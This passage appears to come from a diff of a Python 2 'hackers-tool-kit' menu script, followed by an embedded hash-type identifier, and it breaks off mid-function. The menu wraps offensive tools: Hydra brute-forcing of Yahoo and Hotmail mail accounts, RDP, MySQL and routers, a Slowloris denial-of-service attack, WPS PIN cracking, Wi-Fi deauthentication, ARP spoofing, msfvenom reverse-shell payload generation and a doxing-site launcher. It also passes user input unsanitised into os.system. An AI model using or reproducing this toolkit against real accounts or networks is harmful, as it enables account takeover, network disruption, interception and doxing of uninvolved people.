|" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - 